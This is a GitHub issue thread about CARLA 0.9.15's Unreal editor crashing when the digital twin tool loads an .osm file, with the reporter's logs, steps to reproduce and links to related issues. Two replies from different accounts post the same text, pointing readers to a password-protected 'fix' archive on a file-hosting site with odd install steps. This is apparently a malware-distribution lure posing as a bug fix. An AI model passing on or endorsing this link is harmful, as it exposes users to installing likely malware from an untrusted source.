carla-simulator/carla #8082: CARLA UE4 Crash when Loading .osm File with Digital Twin Tool

UjwalWip, 2024-08-27:
Hello, 
I am facing an issue with the digital twin tool.

CARLA version: 0.9.15
Platform/OS: Ubuntu 20.04

Problem you have experienced: I am trying to utilise the digital twin tool to generate a custom map but like few other posts here, my UE editor crashes when I try to enter the directory location of the .osm file and click on config. 
[image]

Here is the crash context and CarlaUE4 log- 
[Crash Error.zip](https://github.com/user-attachments/files/16757589/Crash.Error.zip)
Also, after this error occurs for the first time, there is another error that shows up after restarting the carla UE editor regarding the Houdini plugin: 
[image]

What you expected to happen: Use the directional arrows and the zoom icons to navigate the map and find a part of the road network you want to turn into a CARLA map. The square region you see in the preview will be the extent of your map. 

Steps to reproduce: Follow documentation here- https://carla.readthedocs.io/en/latest/adv_digital_twin/

Other information (documentation you consulted, workarounds you tried):
1. https://github.com/carla-simulator/carla/issues/7011 - No proper solution suggested/Didn't understand 
2. https://github.com/carla-simulator/carla/issues/6913 - Similar issue but not the same, says fixed in the latest dev branch which is what Im using.
3. Other posts suggest that it doesn't work for large maps (they were using windows) but the map Im using is only 2km^2 although it  does contain many buildings

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

praveenking945, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

IrfanAli91170, 2025-02-19:
Hello, I have the same issue here also.